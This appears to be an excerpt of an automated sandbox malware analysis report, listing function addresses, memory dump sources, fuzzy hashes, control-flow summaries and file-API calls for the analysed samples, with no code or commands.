                                                          Function 00007FFD9B7709B0 Relevance: 5.2, Strings: 4, Instructions: 183COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1716023327.00007FFD9B770000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B770000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_7ffd9b770000_0JLWNg4Sz1.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: c9$!k9$"s9$#{9
                                                          • API String ID: 0-1692736845
                                                          • Opcode ID: 51fd79c667bacd829b0d4d19991ac8e0617b0579adac06d6b4f1d291b1fe4dc3
                                                          • Instruction ID: 94ed6aca618183f7cef260e4564ba404950b9f2db8b5c9dc2806387ef64cf9cd
                                                          • Opcode Fuzzy Hash: 51fd79c667bacd829b0d4d19991ac8e0617b0579adac06d6b4f1d291b1fe4dc3
                                                          • Instruction Fuzzy Hash: 9A41F20BB8D6264DE31933FD75619FD6B82CFA1379B0842B7F15E890D74E48208187E5

                                                          Execution Graph

                                                          Execution Coverage:2.4%
                                                          Dynamic/Decrypted Code Coverage:0%
                                                          Signature Coverage:0%
                                                          Total number of Nodes:6
                                                          Total number of Limit Nodes:0
                                                          execution_graph 37503 7ffd9b7c74b5 37505 7ffd9b7c74cf CreateFileTransactedW 37503->37505 37506 7ffd9b7c75ca 37505->37506 37499 7ffd9b7c7691 37500 7ffd9b7c76f4 WriteFile 37499->37500 37502 7ffd9b7c7777 37500->37502

                                                          Executed Functions

                                                          Function 00007FFD9B780D47 Relevance: 1.5, Strings: 1, Instructions: 267COMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 129 7ffd9b780d47-7ffd9b780d9b call 7ffd9b7807d0 132 7ffd9b780da0-7ffd9b780eb9 129->132 147 7ffd9b780ebb-7ffd9b780f05 132->147 148 7ffd9b780f27-7ffd9b781050 132->148 156 7ffd9b780f1e 147->156 157 7ffd9b780f07-7ffd9b780f1d 147->157 158 7ffd9b780f1f-7ffd9b780f26 156->158 157->158 158->148
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000006.00000002.4182000184.00007FFD9B780000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B780000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_6_2_7ffd9b780000_DViaOgnvmAhwCXZ.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: 5Y_H
                                                          • API String ID: 0-3237497481
                                                          • Opcode ID: c9b3f4c396b5886fef91f0c79c9ae4a78e5ce7080a4b3b9163b9669dcf80660a
                                                          • Instruction ID: 94974c149f9318d60194d02cb792eedd3b15e4cc3babdeca107c78842f2d0c8d
                                                          • Opcode Fuzzy Hash: c9b3f4c396b5886fef91f0c79c9ae4a78e5ce7080a4b3b9163b9669dcf80660a
                                                          • Instruction Fuzzy Hash: 03911375A19A8D8FE799EF688869BA97FE5FF55311F0002BED049C72E2DE781410C700
                                                          Function 00007FFD9BB25384 Relevance: .4, Instructions: 436COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000006.00000002.4187528742.00007FFD9BB20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BB20000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_6_2_7ffd9bb20000_DViaOgnvmAhwCXZ.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 396eb9fe5c07a4a2e58a19077709b78207a44c97c9269c7e100d1f7ffdc324d5
                                                          • Instruction ID: 59b1fbd138fb4209c2770113ac541e04446cb1860403655e86993687353d775a
                                                          • Opcode Fuzzy Hash: 396eb9fe5c07a4a2e58a19077709b78207a44c97c9269c7e100d1f7ffdc324d5
                                                          • Instruction Fuzzy Hash: 3BD1D721B19A1D4FEBA8EB6884656BC73D2FFA9314F45017DD41EC32E2DD287D828781
                                                          Function 00007FFD9B7C74B5 Relevance: 1.7, APIs: 1, Instructions: 154COMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 113 7ffd9b7c74b5-7ffd9b7c7542 117 7ffd9b7c754c-7ffd9b7c75c8 CreateFileTransactedW 113->117 118 7ffd9b7c7544-7ffd9b7c7549 113->118 119 7ffd9b7c75ca 117->119 120 7ffd9b7c75d0-7ffd9b7c75fa 117->120 118->117 119->120
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000006.00000002.4182000184.00007FFD9B7B1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7B1000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_6_2_7ffd9b7b1000_DViaOgnvmAhwCXZ.jbxd
                                                          Similarity
                                                          • API ID: CreateFileTransacted
                                                          • String ID:
                                                          • API String ID: 2149338676-0
                                                          • Opcode ID: 087f8df9f50c97cecbe848a5a16e0cd8f1d26812891d6f0adba686bc54466401
                                                          • Instruction ID: f415f8f29e3d72ab4e17c400024afb907dae7e93c9b7c20b419539f0e6430d4d
                                                          • Opcode Fuzzy Hash: 087f8df9f50c97cecbe848a5a16e0cd8f1d26812891d6f0adba686bc54466401
                                                          • Instruction Fuzzy Hash: 3F41A07190CB5C8FDB58DF48D845AA97BF0FB69310F00426FE089D3251CA70A8458B82
                                                          Function 00007FFD9B7C7691 Relevance: 1.6, APIs: 1, Instructions: 135fileCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 122 7ffd9b7c7691-7ffd9b7c7721 125 7ffd9b7c772b-7ffd9b7c7775 WriteFile 122->125 126 7ffd9b7c7723-7ffd9b7c7728 122->126 127 7ffd9b7c7777 125->127 128 7ffd9b7c777d-7ffd9b7c77a5 125->128 126->125 127->128
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000006.00000002.4182000184.00007FFD9B7B1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7B1000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_6_2_7ffd9b7b1000_DViaOgnvmAhwCXZ.jbxd
                                                          Similarity
                                                          • API ID: FileWrite
                                                          • String ID:
                                                          • API String ID: 3934441357-0
                                                          • Opcode ID: 7e70422e3dab4a3a26e7f76fc19fbb4afc6b4577b9e3d5a311ec3d502363f181
                                                          • Instruction ID: 1cb173efe2eff617fcc4c18490645889de38899e403f6f4e1f2cdd8072373ee1
                                                          • Opcode Fuzzy Hash: 7e70422e3dab4a3a26e7f76fc19fbb4afc6b4577b9e3d5a311ec3d502363f181
                                                          • Instruction Fuzzy Hash: A931A03090CA5C9FDB18DF58D845AB9BBF1FBA9311F00426FD049D3292CB74A846CB91
                                                          Function 00007FFD9BB2A3BC Relevance: 1.4, Strings: 1, Instructions: 156COMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000006.00000002.4187528742.00007FFD9BB20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BB20000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_6_2_7ffd9bb20000_DViaOgnvmAhwCXZ.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: I
                                                          • API String ID: 0-3707901625
                                                          • Opcode ID: f5d047811063d00cd95f0b36e72e1522580f351135c25dfc030ab5aea7f1f357
                                                          • Instruction ID: 12da4a102c0be0e53f985e9357e5f85cd4a9e853f95d081a490215e5bba1e113
                                                          • Opcode Fuzzy Hash: f5d047811063d00cd95f0b36e72e1522580f351135c25dfc030ab5aea7f1f357
                                                          • Instruction Fuzzy Hash: 66517B31A0E68D4FE725EB6488647A47BA1FFA5304F1A01BAC06DC71E3D92CA986C741
                                                          Function 00007FFD9B78116D Relevance: 1.3, Strings: 1, Instructions: 88COMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000006.00000002.4182000184.00007FFD9B780000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B780000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_6_2_7ffd9b780000_DViaOgnvmAhwCXZ.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: H
                                                          • API String ID: 0-2852464175
                                                          • Opcode ID: c57d4da41f86c6e8aeae10a1b6c1c0d2f0332d54f3cf2c86f8489495054bd456
                                                          • Instruction ID: 1496ea62364b6d8b103ee301f331cf2705e3419421dc02a7e9a7f300e37c0fe5
                                                          • Opcode Fuzzy Hash: c57d4da41f86c6e8aeae10a1b6c1c0d2f0332d54f3cf2c86f8489495054bd456
                                                          • Instruction Fuzzy Hash: 28316430E09A4D8FDB45EBA4C8A4ABD77F0FF59301F0546BAD009D71B2DA38A544C750
                                                          Function 00007FFD9BB30219 Relevance: 1.3, Strings: 1, Instructions: 27COMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 227 7ffd9bb30219-7ffd9bb3024a 228 7ffd9bb3024e-7ffd9bb30255 227->228
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000006.00000002.4187528742.00007FFD9BB20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BB20000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_6_2_7ffd9bb20000_DViaOgnvmAhwCXZ.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: M
                                                          • API String ID: 0-3664761504
                                                          • Opcode ID: 5b213f5a208a89afd215b12a857d93392c7307cd454a95f86bea9abd90c8df24
                                                          • Instruction ID: 511fc90b3ce4c6321c00f0ec5fd7d745da5ddc99fa77fe3b9450ea2b2eedfa2e
                                                          • Opcode Fuzzy Hash: 5b213f5a208a89afd215b12a857d93392c7307cd454a95f86bea9abd90c8df24
                                                          • Instruction Fuzzy Hash: 05E09B6190E3C44FC71A963448558547FA0DE6725174A41EFC441CF1A7E92CC889C751
                                                          Function 00007FFD9BB2C849 Relevance: 1.3, Strings: 1, Instructions: 25COMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 238 7ffd9bb2c849-7ffd9bb2c874 240 7ffd9bb2c878-7ffd9bb2c87d 238->240
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000006.00000002.4187528742.00007FFD9BB20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BB20000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_6_2_7ffd9bb20000_DViaOgnvmAhwCXZ.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: I
                                                          • API String ID: 0-3707901625
                                                          • Opcode ID: feeb6fabcbbfc95588a97928eaa7c92921927f2ec9827ca1f60dbfe6181f65bf
                                                          • Instruction ID: 8067a6f6c53937432c5f4c711f4cfd969c0e69cc88cef33e7819bd143a333e8d
                                                          • Opcode Fuzzy Hash: feeb6fabcbbfc95588a97928eaa7c92921927f2ec9827ca1f60dbfe6181f65bf
                                                          • Instruction Fuzzy Hash: 58E01A7154F3C44FCB16AB7488A98593FB0EE6B25178B41EEC085CF1B3E62E984AC701
                                                          Function 00007FFD9BB2A549 Relevance: 1.3, Strings: 1, Instructions: 25COMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 235 7ffd9bb2a549-7ffd9bb2a55d 236 7ffd9bb2a55f-7ffd9bb2a574 235->236 237 7ffd9bb2a578-7ffd9bb2a57d 236->237
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000006.00000002.4187528742.00007FFD9BB20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BB20000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_6_2_7ffd9bb20000_DViaOgnvmAhwCXZ.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: I
                                                          • API String ID: 0-3707901625
                                                          • Opcode ID: b1e7316cb25ae1e30ff263ab4f5c910e2c1d4cce4b843646326281ef6f1ca109
                                                          • Instruction ID: 2824137cd5c5ff0410fe65ba4df960c1a114555cc014c8f037c3481cadf27e71
                                                          • Opcode Fuzzy Hash: b1e7316cb25ae1e30ff263ab4f5c910e2c1d4cce4b843646326281ef6f1ca109
                                                          • Instruction Fuzzy Hash: DEE0E57154E7C44FCB16AA7888659453FA0AE6B21078B41EEC08ACB1B3E6299849CB01
                                                          Function 00007FFD9BB2E149 Relevance: 1.3, Strings: 1, Instructions: 22COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000006.00000002.4187528742.00007FFD9BB20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BB20000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_6_2_7ffd9bb20000_DViaOgnvmAhwCXZ.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: I
                                                          • API String ID: 0-3707901625
                                                          • Opcode ID: b7ab5d36a72f6b50d7ece8d66019fcb94d958490e6cc6e8241b25cbf8e5e16a0
                                                          • Instruction ID: cafc8fa05f3e1afcee4cbb4765646926918f4256a46a1adec3ca3d16ddc6526a
                                                          • Opcode Fuzzy Hash: b7ab5d36a72f6b50d7ece8d66019fcb94d958490e6cc6e8241b25cbf8e5e16a0
                                                          • Instruction Fuzzy Hash: EBE01A7155E7C44FCB16EB75886A9457FA0EE6B21178B40EEC085CF1B3E62D8849C701
                                                          Function 00007FFD9BB28649 Relevance: 1.3, Strings: 1, Instructions: 22COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000006.00000002.4187528742.00007FFD9BB20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BB20000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_6_2_7ffd9bb20000_DViaOgnvmAhwCXZ.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: I
                                                          • API String ID: 0-3707901625
                                                          • Opcode ID: dae24cd4dcc403fbf611f35780ca165e87f2f029ac73a0c3e20e6bbf0b8fb7ac
                                                          • Instruction ID: aa050b62decdbc9c4e006a4cdc0d2afe6a9732cb93ee84f632ab12ac147c40a1
                                                          • Opcode Fuzzy Hash: dae24cd4dcc403fbf611f35780ca165e87f2f029ac73a0c3e20e6bbf0b8fb7ac
                                                          • Instruction Fuzzy Hash: BBE01A6154E7D44FCB16EB74886A9457FA0EE6B21178B40EEC085CF1B3E62D8949C701
                                                          Function 00007FFD9BB285CA Relevance: 1.3, Strings: 1, Instructions: 22COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000006.00000002.4187528742.00007FFD9BB20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BB20000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_6_2_7ffd9bb20000_DViaOgnvmAhwCXZ.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: M
                                                          • API String ID: 0-3664761504
                                                          • Opcode ID: 7dfad206352da00f9ae3ecc07db8b17a8a280b74c443ceaa3dcdaaf97f318f83
                                                          • Instruction ID: c65c39135d868c7db893f1a636fff15da0ace474cdd60d6728908e43463d4ba1
                                                          • Opcode Fuzzy Hash: 7dfad206352da00f9ae3ecc07db8b17a8a280b74c443ceaa3dcdaaf97f318f83
                                                          • Instruction Fuzzy Hash: 09E0C27160A5484FDB18EA388468851BF80EF7630134552ADC01ACB1A6EE29D8C5CB40
                                                          Function 00007FFD9BB24CD9 Relevance: 1.3, Strings: 1, Instructions: 22COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000006.00000002.4187528742.00007FFD9BB20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BB20000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_6_2_7ffd9bb20000_DViaOgnvmAhwCXZ.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: I
                                                          • API String ID: 0-3707901625
                                                          • Opcode ID: 5dd0f9555834fcd88c17859a9f6d5e4c34b4bd36fd62a516dd338067c6809ae5
                                                          • Instruction ID: 45392c3ef9a2b22bdc4e45180ab33a29f6c29773b55b01cf844dfa286abc0acf
                                                          • Opcode Fuzzy Hash: 5dd0f9555834fcd88c17859a9f6d5e4c34b4bd36fd62a516dd338067c6809ae5
                                                          • Instruction Fuzzy Hash: 3DE01A7154F7C44FCB16EB74886A9457FA0AE67210B8B40EEC18ACF1B7E66D8849C701
                                                          Function 00007FFD9B7A97E9 Relevance: 1.3, Strings: 1, Instructions: 22COMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 241 7ffd9b7a97e9-7ffd9b7a9814 243 7ffd9b7a9818-7ffd9b7a981d 241->243
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000006.00000002.4182000184.00007FFD9B7A4000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7A4000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_6_2_7ffd9b7a4000_DViaOgnvmAhwCXZ.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: I
                                                          • API String ID: 0-3707901625
                                                          • Opcode ID: 50a72f8f5a499ccb5e7007a3f10a0a7542f54e3b1830416ba008f18cfb92deff
                                                          • Instruction ID: 70a7c48f7ea405d04d2e2f278b39ca8accb3aa91eb051a2a18910390191f85dd
                                                          • Opcode Fuzzy Hash: 50a72f8f5a499ccb5e7007a3f10a0a7542f54e3b1830416ba008f18cfb92deff
                                                          • Instruction Fuzzy Hash: 5AE01A7194F7C44FCB56EB7488698547FA1AF6721078B41EEC085CF1B3E62D9849C711
                                                          Function 00007FFD9B7A9999 Relevance: 1.3, Strings: 1, Instructions: 22COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000006.00000002.4182000184.00007FFD9B7A4000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7A4000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_6_2_7ffd9b7a4000_DViaOgnvmAhwCXZ.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: I
                                                          • API String ID: 0-3707901625
                                                          • Opcode ID: 0404cd75c212662a854936983791a9835eed55f26d615e0e7cd2386bcdaf9225
                                                          • Instruction ID: b35958965a4bc59d918b46a38b33eac6e053cce3c5728d81fb954d93fcd9bdd1
                                                          • Opcode Fuzzy Hash: 0404cd75c212662a854936983791a9835eed55f26d615e0e7cd2386bcdaf9225
                                                          • Instruction Fuzzy Hash: C5E04F7054A3C04FCB0AEB7484698447FB0EE6721078B41EEC049CB1B3E72D894ACB01
                                                          Function 00007FFD9B791648 Relevance: .9, Instructions: 915COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000006.00000002.4182000184.00007FFD9B790000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B790000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_6_2_7ffd9b790000_DViaOgnvmAhwCXZ.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: a81f3ccf7882e12dae50bbd172bd55ff1bb124794e08f419a959625ac7feae63
                                                          • Instruction ID: 0db7e22316ba6263a604f8125911200928faf6256e7d5216c1a13ac1d149ad26
                                                          • Opcode Fuzzy Hash: a81f3ccf7882e12dae50bbd172bd55ff1bb124794e08f419a959625ac7feae63
                                                          • Instruction Fuzzy Hash: C152B671B19A4E4FEBA8EB5884A16B87392FF98340F0506B9D01DC32E7DD34BD918781
                                                          Function 00007FFD9B790DD6 Relevance: .7, Instructions: 747COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000006.00000002.4182000184.00007FFD9B790000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B790000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_6_2_7ffd9b790000_DViaOgnvmAhwCXZ.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: ef6bfeb70297cf4de6b5d393464e8fe679ba2eeea2633765d8267b636380e46f
                                                          • Instruction ID: 373f475f30d1aa2f43f790b73b5c1f105506e3a1fa4ca90d19ea52310dd632f3
                                                          • Opcode Fuzzy Hash: ef6bfeb70297cf4de6b5d393464e8fe679ba2eeea2633765d8267b636380e46f
                                                          • Instruction Fuzzy Hash: 1D42B731B19A5E4FEBA8EB5884A16B873D2FF58340F1506B9D01DC32E6DE34BD918781
                                                          Function 00007FFD9B791A4E Relevance: .4, Instructions: 411COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000006.00000002.4182000184.00007FFD9B790000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B790000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_6_2_7ffd9b790000_DViaOgnvmAhwCXZ.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 3b86db1ba1f4db1c8d95c69eb9d43629914ead804c9727876c76cb37909a3e92
                                                          • Instruction ID: 1be3d6247ce2637817a785da07773605638f630362f4754a7bbb0f0a59453729
                                                          • Opcode Fuzzy Hash: 3b86db1ba1f4db1c8d95c69eb9d43629914ead804c9727876c76cb37909a3e92
                                                          • Instruction Fuzzy Hash: 5DD1B531B19A4A4FE7A8EB5884A16B873E2FF58300F0506B9D05EC35F7DE34B9918781
                                                          Function 00007FFD9B7911CD Relevance: .4, Instructions: 403COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000006.00000002.4182000184.00007FFD9B790000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B790000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_6_2_7ffd9b790000_DViaOgnvmAhwCXZ.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 50956fee15eb9708719d5afe30679caa456964d4ce312eec1766487e27a29739
                                                          • Instruction ID: e61b6d63aae67287f498cfbf86201af4ac9f6f6768ec4a16a57676f914adf472
                                                          • Opcode Fuzzy Hash: 50956fee15eb9708719d5afe30679caa456964d4ce312eec1766487e27a29739
                                                          • Instruction Fuzzy Hash: 85D1F821F19A1D5FEBB4EA6C84A577837A6EF98311F050675D40EC32F2DE28BE918341
                                                          Function 00007FFD9B7A99D1 Relevance: .3, Instructions: 309COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000006.00000002.4182000184.00007FFD9B7A4000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7A4000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_6_2_7ffd9b7a4000_DViaOgnvmAhwCXZ.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 4f3eb9de88735eb7bdf3ccc3897c584a88d7e35441c6aa0378fabe65c692c559
                                                          • Instruction ID: 56b54f605635421466e1721fe716c890e7e0476ada994fc8bda0297aeb50dff5
                                                          • Opcode Fuzzy Hash: 4f3eb9de88735eb7bdf3ccc3897c584a88d7e35441c6aa0378fabe65c692c559
                                                          • Instruction Fuzzy Hash: CEA1C530B1890D4FDB99EF68C4A56B977E5FF58300B4106B9E01EC72E6CE38A852C741
                                                          Function 00007FFD9BB28A4D Relevance: .2, Instructions: 177COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000006.00000002.4187528742.00007FFD9BB20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BB20000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_6_2_7ffd9bb20000_DViaOgnvmAhwCXZ.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 3ceebaa7dbe414ecc11ad382ab094aa8777068ba88136cbe415aca30262db772
                                                          • Instruction ID: 7fa597eae8c158f214a1bb97a0c96aaf573c52c562b3ec8c90b91537c6914b74
                                                          • Opcode Fuzzy Hash: 3ceebaa7dbe414ecc11ad382ab094aa8777068ba88136cbe415aca30262db772
                                                          • Instruction Fuzzy Hash: 8C516D32A0E64D4FE7359B648C196F43B90FFA6314F0901BAD099C71F3EE2969558781
                                                          Function 00007FFD9BB25589 Relevance: .2, Instructions: 172COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000006.00000002.4187528742.00007FFD9BB20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BB20000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_6_2_7ffd9bb20000_DViaOgnvmAhwCXZ.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 616101586e46f2de7366fadf662cb28c9443552eb39b2ba557b59b26c5d69d5f
                                                          • Instruction ID: 7e1bc09d20e0fa2b0f47759f3ef944be2c1b136db52b0b374cb2271986d4b60e
                                                          • Opcode Fuzzy Hash: 616101586e46f2de7366fadf662cb28c9443552eb39b2ba557b59b26c5d69d5f
                                                          • Instruction Fuzzy Hash: 92518321B19A1D4FE7A8E65898AA6BC73D2FF98310F4501B9D41EC32E6DD287D818781
                                                          Function 00007FFD9BB2D090 Relevance: .1, Instructions: 146COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000006.00000002.4187528742.00007FFD9BB20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BB20000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_6_2_7ffd9bb20000_DViaOgnvmAhwCXZ.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 86849049d30b4b50512b5e79950f7ff10b1aeffa90c92b9d7e482e9719183b58
                                                          • Instruction ID: ea613de127a70d05c3c2cb250fe36f5b3cfdfca26cd9ca8b47d8fc420e9118a7
                                                          • Opcode Fuzzy Hash: 86849049d30b4b50512b5e79950f7ff10b1aeffa90c92b9d7e482e9719183b58
                                                          • Instruction Fuzzy Hash: 1B51F331E0895D8FEBA9DB18C855BF877B1EBA8301F0001EAD05DD3292DE746A85CB81
                                                          Function 00007FFD9BB2C8E2 Relevance: .1, Instructions: 140COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000006.00000002.4187528742.00007FFD9BB20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BB20000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_6_2_7ffd9bb20000_DViaOgnvmAhwCXZ.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 0c5fe55cb57ff916115f3e283b9ee3e68b92fe6ba75969a96cf4f21ccbb7545f
                                                          • Instruction ID: 25262ee27e52025d76f91ea1b7e39caeee4b01cbe7f3b3ca4de2645b542c08ca
                                                          • Opcode Fuzzy Hash: 0c5fe55cb57ff916115f3e283b9ee3e68b92fe6ba75969a96cf4f21ccbb7545f
                                                          • Instruction Fuzzy Hash: 0641C571A0895D8FDBA9EB18C855BF877B1FBA8301F0101EAD05ED3291DE746A81CB81
                                                          Function 00007FFD9B780908 Relevance: .1, Instructions: 118COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000006.00000002.4182000184.00007FFD9B780000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B780000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_6_2_7ffd9b780000_DViaOgnvmAhwCXZ.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: dfa560b8674232b036245963f28da186a8f4c138d6b1b6fd382aa6a4ebc34706
                                                          • Instruction ID: 34b20c2f54227a925371e3e52f426af9c15f873fae4c998717b44a7f8a130e19
                                                          • Opcode Fuzzy Hash: dfa560b8674232b036245963f28da186a8f4c138d6b1b6fd382aa6a4ebc34706
                                                          • Instruction Fuzzy Hash: 0521EA3130DD184FE768EA5CE889DB977D1EF9932171501BAE58EC7135E921EC8287C1
                                                          Function 00007FFD9B780998 Relevance: .1, Instructions: 112COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000006.00000002.4182000184.00007FFD9B780000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B780000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_6_2_7ffd9b780000_DViaOgnvmAhwCXZ.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
